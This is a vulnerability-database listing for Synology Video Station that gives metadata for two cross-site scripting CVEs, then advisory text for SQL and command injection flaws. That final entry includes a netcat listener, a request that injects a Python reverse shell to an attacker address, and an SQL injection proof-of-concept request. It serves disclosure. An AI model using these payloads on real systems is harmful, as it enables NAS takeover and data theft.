Search criteria
8 vulnerabilities found for Video Station by Synology
VAR-201706-0045
Vulnerability from variot - Updated: 2025-04-20 23:35Multiple cross-site scripting (XSS) vulnerabilities in Synology Video Station 1.2 before 1.2-0455, 1.5 before 1.5-0772, and 1.6 before 1.6-0847 allow remote authenticated attackers to inject arbitrary web script or HTML via the (1) file name or (2) collection name of videos. Synology Video Station is a video manager from Synology
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201706-0045",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "video station",
"scope": "eq",
"trust": 1.6,
"vendor": "synology",
"version": "1.6-0840"
},
{
"model": "video station",
"scope": "eq",
"trust": 1.6,
"vendor": "synology",
"version": "1.2-0453"
},
{
"model": "video station",
"scope": "eq",
"trust": 1.6,
"vendor": "synology",
"version": "1.6-0844"
},
{
"model": "video station",
"scope": "eq",
"trust": 1.6,
"vendor": "synology",
"version": "1.6-0835"
},
{
"model": "video station",
"scope": "eq",
"trust": 1.6,
"vendor": "synology",
"version": "1.2-0451"
},
{
"model": "video station",
"scope": "eq",
"trust": 1.6,
"vendor": "synology",
"version": "1.2-0439"
},
{
"model": "video station",
"scope": "eq",
"trust": 1.6,
"vendor": "synology",
"version": "1.2-0447"
},
{
"model": "video station",
"scope": "eq",
"trust": 1.6,
"vendor": "synology",
"version": "1.5-0770"
},
{
"model": "video station",
"scope": "eq",
"trust": 1.6,
"vendor": "synology",
"version": "1.6-0841"
},
{
"model": "video station",
"scope": "eq",
"trust": 1.6,
"vendor": "synology",
"version": "1.2-0443"
},
{
"model": "video station",
"scope": "eq",
"trust": 1.0,
"vendor": "synology",
"version": "1.5-0763"
},
{
"model": "video station",
"scope": "eq",
"trust": 1.0,
"vendor": "synology",
"version": "1.5-0753"
},
{
"model": "video station",
"scope": "eq",
"trust": 1.0,
"vendor": "synology",
"version": "1.5-0757"
},
{
"model": "video station",
"scope": "eq",
"trust": 1.0,
"vendor": "synology",
"version": "1.5-0754"
},
{
"model": "video station",
"scope": "lt",
"trust": 0.8,
"vendor": "synology",
"version": "1.6"
},
{
"model": "video station",
"scope": "eq",
"trust": 0.8,
"vendor": "synology",
"version": "1.6-0847"
},
{
"model": "video station",
"scope": "lt",
"trust": 0.8,
"vendor": "synology",
"version": "1.5"
},
{
"model": "video station",
"scope": "eq",
"trust": 0.8,
"vendor": "synology",
"version": "1.2-0455"
},
{
"model": "video station",
"scope": "eq",
"trust": 0.8,
"vendor": "synology",
"version": "1.5-0772"
},
{
"model": "video station",
"scope": "lt",
"trust": 0.8,
"vendor": "synology",
"version": "1.2"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007630"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1194"
},
{
"db": "NVD",
"id": "CVE-2015-9105"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:synology:video_station",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007630"
}
]
},
"cve": "CVE-2015-9105",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CVE-2015-9105",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "VHN-87066",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"id": "CVE-2015-9105",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-9105",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2015-9105",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201706-1194",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-87066",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-87066"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007630"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1194"
},
{
"db": "NVD",
"id": "CVE-2015-9105"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in Synology Video Station 1.2 before 1.2-0455, 1.5 before 1.5-0772, and 1.6 before 1.6-0847 allow remote authenticated attackers to inject arbitrary web script or HTML via the (1) file name or (2) collection name of videos. Synology Video Station is a video manager from Synology",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-9105"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007630"
},
{
"db": "VULHUB",
"id": "VHN-87066"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-9105",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007630",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1194",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-87066",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-87066"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007630"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1194"
},
{
"db": "NVD",
"id": "CVE-2015-9105"
}
]
},
"id": "VAR-201706-0045",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-87066"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-20T23:35:49.951000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Video Station 1.5-0772",
"trust": 0.8,
"url": "https://www.synology.com/en-global/support/security/Video_station_1_5_0772"
},
{
"title": "Synology Video Station Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=71229"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007630"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1194"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-87066"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007630"
},
{
"db": "NVD",
"id": "CVE-2015-9105"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.fortiguard.com/zeroday/fg-vd-15-107"
},
{
"trust": 2.5,
"url": "http://www.fortiguard.com/zeroday/fg-vd-15-108"
},
{
"trust": 1.7,
"url": "https://www.synology.com/en-global/support/security/video_station_1_5_0772"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-9105"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-9105"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-87066"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007630"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1194"
},
{
"db": "NVD",
"id": "CVE-2015-9105"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-87066"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007630"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1194"
},
{
"db": "NVD",
"id": "CVE-2015-9105"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-30T00:00:00",
"db": "VULHUB",
"id": "VHN-87066"
},
{
"date": "2017-07-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007630"
},
{
"date": "2017-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201706-1194"
},
{
"date": "2017-06-30T13:29:00.287000",
"db": "NVD",
"id": "CVE-2015-9105"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-87066"
},
{
"date": "2017-07-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007630"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201706-1194"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2015-9105"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201706-1194"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Synology Video Station Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007630"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201706-1194"
}
],
"trust": 0.6
}
}
VAR-201708-1427
Vulnerability from variot - Updated: 2025-04-20 23:35Cross-site scripting (XSS) vulnerability in Video Metadata Editor in Synology Video Station before 2.3.0-1435 allows remote authenticated attackers to inject arbitrary web script or HTML via the title parameter. Synology Video Station Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Synology Video Station is a video manager from Synology. Video Metadata Editor is one of the video metadata editors
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201708-1427",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "video station",
"scope": "lte",
"trust": 1.0,
"vendor": "synology",
"version": "2.2.1-1364"
},
{
"model": "video station",
"scope": "lt",
"trust": 0.8,
"vendor": "synology",
"version": "2.3.0-1435"
},
{
"model": "video station",
"scope": "eq",
"trust": 0.6,
"vendor": "synology",
"version": "2.2.1-1364"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006968"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-576"
},
{
"db": "NVD",
"id": "CVE-2017-9556"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:synology:video_station",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006968"
}
]
},
"cve": "CVE-2017-9556",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CVE-2017-9556",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "VHN-117759",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"id": "CVE-2017-9556",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-9556",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2017-9556",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201708-576",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-117759",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-117759"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006968"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-576"
},
{
"db": "NVD",
"id": "CVE-2017-9556"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in Video Metadata Editor in Synology Video Station before 2.3.0-1435 allows remote authenticated attackers to inject arbitrary web script or HTML via the title parameter. Synology Video Station Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Synology Video Station is a video manager from Synology. Video Metadata Editor is one of the video metadata editors",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9556"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006968"
},
{
"db": "VULHUB",
"id": "VHN-117759"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-9556",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006968",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201708-576",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-117759",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-117759"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006968"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-576"
},
{
"db": "NVD",
"id": "CVE-2017-9556"
}
]
},
"id": "VAR-201708-1427",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-117759"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-20T23:35:46.960000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Synology-SA-17:39 Video Station",
"trust": 0.8,
"url": "https://www.synology.com/en-global/support/security/Synology_SA_17_39_Video_Station"
},
{
"title": "Synology Video Station Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=73989"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006968"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-576"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-117759"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006968"
},
{
"db": "NVD",
"id": "CVE-2017-9556"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://www.synology.com/en-global/support/security/synology_sa_17_39_video_station"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-9556"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-9556"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-117759"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006968"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-576"
},
{
"db": "NVD",
"id": "CVE-2017-9556"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-117759"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006968"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-576"
},
{
"db": "NVD",
"id": "CVE-2017-9556"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-11T00:00:00",
"db": "VULHUB",
"id": "VHN-117759"
},
{
"date": "2017-09-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006968"
},
{
"date": "2017-08-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-576"
},
{
"date": "2017-08-11T20:29:00.267000",
"db": "NVD",
"id": "CVE-2017-9556"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-117759"
},
{
"date": "2017-09-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006968"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-576"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-9556"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-576"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Synology Video Station Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006968"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-576"
}
],
"trust": 0.6
}
}
VAR-201509-0203
Vulnerability from variot - Updated: 2025-04-13 23:18SQL injection vulnerability in Synology Video Station before 1.5-0763 allows remote attackers to execute arbitrary SQL commands via the id parameter to watchstatus.cgi. Synology Video Station is a video manager from Synology. As a result it is possible to compromise the PostgreSQL database server.
Affected versions
These issues affect Synology Video Station version up to and including version 1.5-0757. The script subtitle.cgi can also be called when the 'public share' option is enabled. With this option enabled, this issue can also be exploited by an unauthenticated remote attacker. This vulnerability can be used to compromise a Synology DiskStation NAS, including all data stored on the NAS, and the NAS as stepping stone to attack other systems.
- Start netcat on attacker's system:
nc -nvlp 80
- Submit the following request (change the IP - 192.168.1.20 - & port number - 80):
GET /webapi/VideoStation/subtitle.cgi?id=193&api=SYNO.VideoStation.Subtitle&method=get&version=2&subtitle_id=%2Fvolume1%2Fvideo%2Fmr.robot.s01e10.720p.hdtv.x264-killers.nfo%2FMr.Robot.S01E10.720p.HDTV.x264-KILLERS.2aafa5c.eng.srt&subtitle_codepage=auto%26python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.20%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5b%22/bin/sh%22,%22-i%22%5d);'%26&preview=false&sharing_id=kSiNy0Pp HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
SQL injection vulnerability in watchstatus.cgi
A (blind) SQL injection vulnerability exists in the watchstatus.cgi CGI script. As a result it is possible to compromise the PostgreSQL database server. In the following screenshot this issue is exploited using sqlmap.
Proof of concept
POST /webapi/VideoStation/watchstatus.cgi HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: Lq6mE9ANV2egU X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 80 Cookie: stay_login=0; id=Lq5QWGqg7Rnzc13A0LTN001710; jwplayer.volume=50 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
id=15076178770%20or%204864%3d4864--%20&position=10.05&api=SYNO.VideoStation.WatchStatus&method=setinfo&version=1
It should be noted that the X-SYNO-TOKEN header provides protection against Cross-Site Request Forgery attacks. As of DSM version 5.2-5592 Update 3, this protection is enabled by default. As a result it is possible to compromise the PostgreSQL database server. Proof of concept
